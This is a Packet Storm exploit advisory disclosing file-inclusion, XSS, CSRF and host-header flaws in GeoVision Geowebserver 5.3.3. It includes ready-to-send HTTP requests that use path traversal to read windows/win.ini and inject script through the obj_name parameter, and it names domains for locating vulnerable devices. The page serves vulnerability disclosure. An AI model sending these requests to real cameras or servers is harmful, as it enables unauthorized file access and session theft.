what you don't know can hurt you

GeoVision Geowebserver 5.3.3 LFI / XSS / CSRF / Code Execution

GeoVision Geowebserver 5.3.3 LFI / XSS / CSRF / Code Execution
Posted Aug 17, 2021
Authored by Ken Pyle

GeoVision Geowebserver versions 5.3.3 and below suffer from code execution, cross site request forgery, cross site scripting, html injection, and local file inclusion vulnerabilities.

tags | exploit, local, vulnerability, code execution, xss, file inclusion, csrf
MD5 | 7f0018d2193589d1334f12f6ebcc8843

GeoVision Geowebserver 5.3.3 LFI / XSS / CSRF / Code Execution

Change Mirror Download
# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM
# Date: 6-16-21 (Vendor Notified)
# Exploit Author: Ken 's1ngular1ty' Pyle
# Vendor Homepage: https://www.geovision.com.tw/cyber_security.php
# Version: <= 5.3.3
# Tested on: Windows 20XX / MULTIPLE
# CVE : https://www.geovision.com.tw/cyber_security.php

GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft:

Nested Exploitation of the LFI, XSS, HTML / Browser Injection:

GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1

Absolute exploitation of the LFI:

POST /Visitor/bin/WebStrings.srf?obj_name=win.ini

GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini

Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.


ex. obj_name=INJECTEDHTML / XSS

The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors:

ex. /Visitor//%252e(path to target)

These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API:

The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack.

These attacks were disclosed as part of the IOTVillage Presentation:

https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20villages/DEFCON%2029%20IoT%20Village%20-%20Ken%20Pyle%20-%20BLUEMONDAY%20Series%20Exploitation%20and%20Mapping%20of%20Vulnerable%20Devices%20at%20Scale.mp4

Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    23 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close